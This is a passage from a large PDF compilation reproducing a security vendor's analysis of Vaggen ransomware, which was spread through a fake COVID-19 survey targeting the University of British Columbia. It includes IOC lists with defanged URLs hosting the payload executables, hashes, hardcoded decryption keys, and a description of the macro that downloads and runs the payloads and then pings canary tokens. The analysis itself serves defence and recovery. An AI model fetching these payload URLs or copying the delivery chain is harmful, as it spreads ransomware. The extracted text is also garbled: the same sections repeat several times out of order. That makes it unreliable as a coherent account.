3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2393 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2394 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2395 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2396 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2397 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2398 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2399 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2400 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2401 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2402 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2403 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2404 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2405 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2406 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2407 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2408 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2409 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2410 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2411 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2412 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2413 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2414 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2415 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2416 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2417 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2418 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2419 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2420 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2421 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2422 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2423 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2424 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2425 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2426 of 